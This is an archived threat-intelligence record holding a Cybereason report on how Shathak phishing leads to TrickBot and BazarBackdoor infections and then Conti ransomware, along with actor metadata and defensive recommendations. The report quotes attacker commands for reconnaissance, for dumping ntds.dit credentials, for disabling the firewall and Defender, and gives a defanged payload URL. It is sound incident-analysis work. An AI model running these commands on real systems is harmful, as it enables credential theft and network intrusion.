{ "id": "e5e442f3-2152-46f2-8d11-b6f154d4c49d", "created_at": "2026-04-06T00:16:32.004535Z", "updated_at": "2026-04-10T03:37:23.809428Z", "deleted_at": null, "sha1_hash": "d21d996d312effb0bcb3a5d02c443a98940ccb24", "title": "THREAT ANALYSIS REPORT: From Shathak Emails to the Conti Ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1281881, "plain_text": "THREAT ANALYSIS REPORT: From Shathak Emails to the Conti\r\nRansomware\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-05 20:01:57 UTC\r\nThe Cybereason Global Security Operations Center (GSOC) issues Cybereason Threat Analysis reports to inform on\r\nimpacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for\r\nprotecting against them. \r\nIn this Threat Analysis report, the GSOC investigates recent attack campaigns that reflect the current developments of the\r\nITG23 threat group (also known as the TrickBot Gang or Wizard Spider). The ITG23 group is partnering with the TA551\r\n(Shathak) threat group to distribute ITG23’s TrickBot and BazarBackdoor malware, which malicious actors use to deploy\r\nITG23’s Conti ransomware on compromised systems.\r\nKey Findings\r\nBeware of Shathak Emails: In partnership with the ITG23 threat group, the Shathak threat group distributes\r\nITG23’s TrickBot and BazarBackdoor malware as password-protected archive files attached to phishing\r\nemails. The archive files contain malicious documents whose macros download and execute the TrickBot or\r\nBazarBackdoor malware. Malicious actors actively use this malware to deploy ITG23’s Conti ransomware on\r\ncompromised systems.\r\nAverage Two Days Time-to-Ransom (TTR): Conti actors do not deploy ransomware immediately after\r\ninitial infection using the TrickBot or BazarBackdoor malware—the actors first conduct other activities, such\r\nas reconnaissance, credential theft, and data exfiltration. We observed an average TTR of approximately two\r\ndays after initial infection.\r\nDetected and Prevented: The Cybereason Defense Platform detects and prevents infections that use the\r\nTrickBot and BazarBackdoor malware that the Shathak threat group distributes, as well as malicious activities\r\nthat Conti actors conduct.\r\nCybereason Managed Detection and Response (MDR): The Cybereason GSOC has zero tolerance towards\r\nattacks that involve ransomware, such as the Conti ransomware, and categorizes such attacks as critical, high-severity incidents. The Cybereason GSOC MDR team issues a comprehensive report to customers when such\r\nan incident occurs. The report provides an in-depth overview of the incident, which helps to scope the extent\r\nof compromise and the impact on the customer’s environment. In addition, the report provides attribution\r\ninformation when possible, as well as recommendations for mitigating and isolating the threat.\r\nIntroduction\r\nThe threat group TA551, also known as Shathak, is an email-based malware distributor that distributes malware through\r\nphishing emails. Shathak has distributed a variety of malware, predominantly malware with information-stealing\r\ncapabilities, such as Ursniff and Valak in 2020, and the IcedID malware after mid-July 2020. \r\nIn October 2021, the IBM X-Force reported that the threat group ITG23, also known as the TrickBot Gang or Wizard Spider,\r\nhad partnered with Shathak at some time around July 2021 to distribute the TrickBot and the BazarBackdoor (also referred\r\nto as BazarLoader) malware. ITG23 develops and maintains TrickBot and BazarBackdoor. TrickBot and BazarBackdoor can\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 1 of 16\n\ndeploy additional malware on compromised systems. TrickBot is a feature-rich and modular malware that has been present\r\non the threat landscape since 2016. \r\nThe implementation of TrickBot has evolved over the years, with recent versions of TrickBot implementing malware-loading capabilities. TrickBot has played a major role in many attack campaigns conducted by different threat actors, from\r\ncommon cybercriminals to nation-state actors. These campaigns have often involved the deployment of ransomware such as\r\nthe Ryuk ransomware. \r\nSince March 2021, malicious actors have been using TrickBot and BazarBackdoor to deploy the Conti ransomware on\r\ncompromised systems. The ITG23 threat group originally developed and now maintains the Conti ransomware. ITG23 uses\r\nthe ransomware-as-a-service (RaaS) model, according to which the developers of the ransomware pay the operators of the\r\nransomware a wage for a successful attack, or a percentage of ransom payments. \r\nConti actors, or Conti ransomware operators, have proven to be a substantial threat by compromising organizations where IT\r\noutages can have life-threatening consequences, such as hospitals and law enforcement agencies. In September 2021, the US\r\nCybersecurity and Infrastructure Security Agency (CISA) and the US Federal Bureau of Investigation (FBI) reported that\r\nmore than 400 Conti ransomware attacks had taken place on U.S. and international organizations. Conti actors frequently\r\nuse a double extortion tactic: if the victim refuses to pay for data decryption, the malicious actor threatens to leak the data or\r\nsell it for profit. \r\nThis report discusses recent attack campaigns that reflect the current developments of ITG23 partnering with Shathak to\r\ndistribute the TrickBot and BazarBackdoor malware, which malicious actors use to deploy the Conti ransomware on\r\ncompromised systems. To this end, the report first provides an overview of a system infection using the TrickBot or\r\nBazarBackdoor malware that the Shathak group distributes, based on recent Shatak malware distribution campaigns that we\r\nanalyzed. \r\nThe report then discusses Conti actor activities that are common across recent Conti actor attack campaigns that we\r\nanalyzed. We focus on activities that Conti actors conduct after establishing a foothold in a system using BazarBackdoor or\r\nTrickBot and before ransomware deployment. A previous report by the Cybereason Nocturnus team documents the\r\nexecution of the Conti ransomware.\r\nAnalysis of shathak and conti ransomware\r\nA Successful Partnership: Shathak and the TrickBot Gang\r\nThe figure below depicts a typical infection using the ITG23’s TrickBot or the BazarBackdoor malware that the Shathak\r\ngroup distributes:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 2 of 16\n\nA typical infection using the TrickBot or the BazarBackdoor malware\nThe Shathak group distributes TrickBot and BazarBackdoor through malicious documents, such as Microsoft Word\ndocuments. Shathak stores malicious documents in password-protected archive files and attaches the archive files to\nphishing emails. A typical malicious document contains a macro, which a user can execute by opening the document and\nenabling macro execution.\nThe macro drops a Microsoft Hypertext Markup Language (HTML) Applications (HTA) file on the file system and then\nexecutes the file using the mshta.exe Windows utility. Malicious actors use mshta.exe to execute malicious HTA files and\nbypass application control solutions that do not account for the malicious use of the Windows utility.\nAn HTA file that we analyzed, named boxDeling.hta, has two main components: a base-64 encoded code stored in the\n\nsection of the boxDeling.hta file with an ID of mainSetDel, and a VBScript script that executes the encoded code:\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\nPage 3 of 16\n\nA macro in a malicious Microsoft Word document executes an HTA file as seen in the Cybereason Defense Platform\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 4 of 16\n\nThe content of \r\nboxDeling.hta: base-64 encoded code and a VBScript script that executes the encoded code\r\nThe base-64 encoded code is a JavaScript script that the malicious actors have obfuscated by using the string reversal\r\ntechnique. The JavaScript script conducts the following activities:\r\nContacts the attacker-controlled endpoint airloweryd.com, located in Germany, and downloads the TrickBot\r\nmalware in the form of a dynamic-link library (DLL) file. The JavaScript script in other HTA files may\r\ncontact a different endpoint and download another malware, such as BazarBackdoor.\r\nStores the downloaded DLL file as the boxDelInt.jpg file in the Public directory, such as C:\\users\\Public\\.\r\nExecutes boxDelInt.jpg—the TrickBot malware—using the regsvr32.exe Windows utility. The JavaScript\r\nscript executes regsvr32.exe using the WshShell object of the Windows Script Host object model:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 5 of 16\n\nThe obfuscated and deobfuscated version of the JavaScript script in \r\nboxDeling.hta\r\nIn recent Shathak malware distribution campaigns that we analyzed, the attacker-controlled endpoints from which malicious\r\nHTA files downloaded malware were primarily located in European countries, with the Netherlands and Slovakia at the top\r\nof the list.   \r\nMalicious actors use the TrickBot or BazarBackdoor malware that the Shathak group distributes to deploy additional\r\nmalware, such as the Conti ransomware. In recent Conti actor attacks that we analyzed, we observed that Conti actors do not\r\ndeploy ransomware immediately after initial compromise using TrickBot or BazarBackdoor. \r\nThe actors first conduct other activities, such as reconnaissance, credential theft, and data exfiltration. We observed an\r\naverage TTR of approximately two days after initial infection. The next section discusses Conti actor activities that are\r\ncommon across recent attack campaigns that we analyzed. We focus on activities that Conti actors conduct after establishing\r\na foothold in a system by using the BazarBackdoor or TrickBot malware that Shathak distributes and before ransomware\r\ndeployment. \r\nConti Actors Take Over from Shathak: Common Activities\r\nCobalt Strike Deployment\r\nConti actors deploy a Cobalt Strike beacon after initial system compromise by using TrickBot or BazarBackdoor. Cobalt\r\nStrike is a common tool of Conti actors for different malicious activities, such as command execution, credential theft, and\r\nlateral movement. Conti actors deploy a Cobalt Strike beacon in the form of a dynamic-link library (DLL) file stored in the\r\nProgramData directory, such as C:\\ProgramData. Conti actors then invoke an exported function of the DLL file, such as\r\nStartW or gimbild, using the rundll32.exe Windows utility:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 6 of 16\n\nConti actors execute a Cobalt Strike beacon as seen in the Cybereason Defense Platform\r\nConti actors establish persistence of the deployed Cobalt Strike beacon by creating a scheduled task using the schtasks\r\nWindows utility. The scheduled task executes the Cobalt Strike beacon by invoking an exported function of the DLL file that\r\nimplements the beacon using the rundll32.exe utility. Conti actors deploy Cobalt Strike beacons laterally on other networked\r\nmachines by executing the schtasks utility, with the command line parameter /s specifying the target machine:\r\nA scheduled task executes a Cobalt Strike beacon as seen in the Cybereason Defense Platform\r\nReconnaissance\r\nIn attack campaigns where a BazarBackdoor infection is the initial entry point into an infrastructure, Conti actors conduct\r\nreconnaissance activities by using BazarBackdoor to execute the following commands:\r\nCommand Description\r\nnltest /domain_trusts\r\n/all_trusts\r\nEnumerates trust relationships in a Windows Active Directory (AD) environment.\r\nnet localgroup\r\nadministrator\r\nEnumerates users that are members of the administrator local group.\r\nnet group \"domain\r\nadmins\" /domain\r\nEnumerates users that are members of the domain admins group such that the designated\r\nDomain Controller (DC) is conducting the enumeration activity.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 7 of 16\n\nnet view /all /domain\r\nEnumerates all shared computers and resources on the system and all domains in the\r\nnetwork.\r\nnet view /all Enumerates all shared computers and resources on the system.\r\nIn addition to the nltest and net Windows utilities, Conti actors use publicly available network scanning tools for\r\nreconnaissance, such as the Advanced IP Scanner and NetScan tools:\r\nConti actors conduct reconnaissance activities using net and NetScan s seen in the Cybereason Defense Platform\r\nIn addition to the nltest and net utilities, Conti actors use the AdFind tool to explore AD environments in greater detail.\r\nConti actors typically execute AdFind stored in a Windows Batch file (.bat) that is placed on the file system:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 8 of 16\n\nConti actors execute AdFind commands as seen in the Cybereason Platform\r\nCredential and Data Theft\r\nConti actors steal credentials by dumping the memory of the Local Security Authority Subsystem Service (lsass) process.\r\nConti actors download PowerShell payload from an attacker-controlled endpoint, such as\r\nhttpx://datasecuritytoday[.]com::757/securiday, which dumps credentials from lsass:\r\nConti actors download payload from httpx://datasecuritytoday[.]com::757/securiday as seen in the Cybereason Defense\r\nPlatform\r\nIn addition to credentials present in the memory of lsass instances, Conti actors steal AD data and credentials that are stored\r\nin ntds.dit files by copying these files. The ntds.dit files are database files that are present on AD DCs, and these files store\r\nAD data, such as password hashes and information about AD user objects, groups, and group memberships. Conti actors\r\ncopy ntds.dit files into the C:\\Windows\\Temp\\crashpad directory by using the ntdsutil tool:\r\nntdsutil “ac i ntds” “ifm” “create full c:\\windows\\temp\\crashpad” q q\r\nIn addition to ntdsutil, Conti actors use the NtdsAudit tool to dump AD domain user details and password hashes from\r\npreviously copied ntds.dit files:\r\nntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv\r\nOn machines running Microsoft Structured Query Language (SQL) database servers, Conti actors dump data databases by\r\nusing the sqlcmd utility. The sqlcmd commands that the actors execute follow the guidelines for dumping data from\r\ndatabases in the publicly disclosed manuals of the Conti Ransomware Affiliate Program:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 9 of 16\n\nConti actors dump data from a database as seen in the Cybereason Defense Platform\r\nLateral Movement\r\nConti actors move laterally to Windows Server instances primarily by using the Remote Desktop Protocol (RDP).  Conti\r\nactors enable RDP connectivity if necessary on compromised machines by creating and setting the following registry value\r\nto 0:\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections \r\nConti actors then use the netsh utility to modify Windows Firewall rules: \r\nnetsh advfirewall set allprofiles state off\r\nnetsh advfirewall firewall set rule group=”remote desktop” new enable=Yes\r\nnetsh firewall set service type = remotedesktop mode = enable\r\nIn addition to establishing RDP connections, Conti actors deploy Cobalt Strike beacons laterally on networked machines by\r\nexecuting the schtasks utility, with the command line parameter /s specifying the target machine. Conti actors also disable\r\nthe real-time monitoring feature of the Windows Defender security solution laterally on networked machines by executing\r\nthe PowerShell command Set-MpPreference -DisableRealTimeMonitoring $true. \r\nConti actors execute the PowerShell command laterally by using the schtasks utility and the Windows Management\r\nInstrumentation (WMI) command-line utility (WMIC) with the node WMIC parameter specifying the target machine:\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 10 of 16\n\nConti actors laterally disable the real-time monitoring feature of Windows Defender as seen in the Cybereason Defense\r\nPlatform\r\nData Exfiltration\r\nConti actors typically exfiltrate data before deploying the Conti ransomware. The exfiltrated data contains stolen credentials\r\nand other data, including potentially sensitive data that the actors can use for extortion. To exfiltrate data to a remote\r\nendpoint, Conti actors use the Rclone tool, whose executable name the actors typically change to evade detection. In the\r\nConti actor campaigns that we analyzed, the actors have changed the executable name of Rclone to sihosts.exe and\r\nserhosts.exe:\r\nConti actors execute Rclone (executable name changed to sihosts.exe) to exfiltrate data as seen in the Cybereason Defense\r\nPlatform\r\nDetection and Prevention\r\nThe Cybereason Defense Platform\r\nThe Cybereason Defense Platform detects threats using multi-layer protection that detects and blocks malicious activities\r\nwith threat intelligence, machine learning, and next-generation antivirus (NGAV) capabilities. The Cybereason Platform is\r\nable to detect and prevent infections that use the TrickBot and BazarBackdoor malware that the Shathak threat group\r\ndistributes, as well as malicious activities that Conti actors conduct. For example, the Cybereason Platform detects:\r\nUsers opening malicious email attachments distributed by the Shathak group\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 11 of 16\n\nThe Cybereason Defense Platform detects users opening malicious email attachments\r\nConti actors deploying a Cobalt Strike beacon\r\nThe Cybereason Defense Platform detects the deployment of Cobalt Strike beacons\r\nConti actors stealing credentials by dumping the memory of the lsass process\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 12 of 16\n\nThe Cybereason Defense Platform detects the dumping of lsass memory \r\nConti actors exfiltrating data using the Rclone tool\r\nThe Cybereason Defense Platform detects data exfiltration activities\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 13 of 16\n\nConti actors executing the Conti ransomware\r\nGeneral Recommendations\r\nSecurely handle email messages that originate from external sources. This includes disabling hyperlinks and\r\ninvestigating the content of email messages to identify phishing attempts.  \r\nEnable the Anti-Ransomware feature in Cybereason NGAV and set the Anti-Ransomware protection mode to\r\nPrevent.\r\nEnable the Anti-Malware feature in Cybereason NGAV and enable the Detect and Prevent modes of this\r\nfeature.\r\nDisable unused RDP services, properly secure used RDP services, and regularly monitor RDP log data for\r\nirregular activities. \r\nRegularly backup files to a secured remote location and implement a data recovery plan. Regular data backups\r\nensure that you can restore your data after a ransomware attack.\r\nUse secure passwords, regularly rotate passwords, and use multi-factor authentication where possible.\r\nCybereason is dedicated to teaming with defenders to end cyber attacks from endpoints to the enterprise to everywhere—\r\nincluding modern ransomware. Schedule a demo today to learn how your organization can benefit from an operation-centric\r\napproach to security.\r\nMITRE ATT\u0026CK Techniques\r\nInitial Access Execution Persistence\r\nDefense\r\nEvasion\r\nCredential\r\nAccess\r\nDiscovery\r\nLateral\r\nMovement\r\nExfiltration\r\nPhishing:\r\nSpearphishing\r\nAttachment\r\nUser\r\nExecution:\r\nMalicious File\r\nScheduled\r\nTask/Job:\r\nScheduled\r\nTask\r\nSigned\r\nBinary\r\nProxy\r\nExecution:\r\nMshta\r\nOS\r\nCredential\r\nDumping:\r\nLSASS\r\nMemory\r\nAccount\r\nDiscovery\r\nRemote\r\nServices:\r\nRemote\r\nDesktop\r\nProtocol\r\nExfiltration\r\nOver\r\nAlternative\r\nProtocol\r\n \r\nScheduled\r\nTask/Job:\r\nScheduled Task\r\n \r\nSigned\r\nBinary\r\nProxy\r\nExecution:\r\nRegsvr32\r\nOS\r\nCredential\r\nDumping:\r\nNTDS\r\nDomain\r\nTrust\r\nDiscovery\r\n   \r\n \r\nWindows\r\nManagement\r\nInstrumentation\r\n \r\nSigned\r\nBinary\r\nProxy\r\nExecution:\r\nRundll32\r\n \r\nNetwork\r\nService\r\nScanning\r\n   \r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 14 of 16\n\nModify\r\nregistry\r\n \r\nRemote\r\nSystem\r\nDiscovery\r\n   \r\nAbout the Researchers:\r\nAleksandar Milenkoski, Senior Threat and Malware Analyst, Cybereason Global SOC\r\nAleksandar Milenkoski is a Senior Threat and Malware Analyst with the Cybereason Global SOC\r\nteam. He is involved primarily in reverse engineering and threat research activities. Aleksandar has a PhD in system\r\nsecurity. Prior to Cybereason, his work focused on research in intrusion detection and reverse engineering security\r\nmechanisms of the Windows 10 operating system.\r\nEli Salem, Senior Security Analyst, Cybereason Global SOC\r\nEli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private\r\nsector of the cyber security industry since 2017. In his free time, he publishes articles about malware research and threat\r\nhunting.\r\nYonatan Gidnian, Senior Security Analyst and Threat Hunter, Cybereason Global SOC\r\nYonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC\r\nteam. Yonatan analyses critical incidents and hunts for novel threats in order to build new detections. He began his career in\r\nthe Israeli Air Force where he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate\r\nabout malware analysis, digital forensics, and incident response.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 15 of 16\n\nAbout the Author\r\nCybereason Global SOC Team\r\nThe Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on every\r\ncontinent. Led by cybersecurity experts with experience working for government, the military and multiple industry\r\nverticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive threats to support\r\nour mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle moves.\r\nAll Posts by Cybereason Global SOC Team\r\nSource: https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nhttps://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware\r\nPage 16 of 16\n\n https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware \nThe Cybereason Defense Platform detects the dumping of lsass memory\nConti actors exfiltrating data using the Rclone tool\nThe Cybereason Defense Platform detects data exfiltration activities\n Page 13 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware" ], "report_names": [ "threat-analysis-report-from-shatak-emails-to-the-conti-ransomware" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434592, "ts_updated_at": 1775792243, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d21d996d312effb0bcb3a5d02c443a98940ccb24.pdf", "text": "https://archive.orkl.eu/d21d996d312effb0bcb3a5d02c443a98940ccb24.txt", "img": "https://archive.orkl.eu/d21d996d312effb0bcb3a5d02c443a98940ccb24.jpg" } }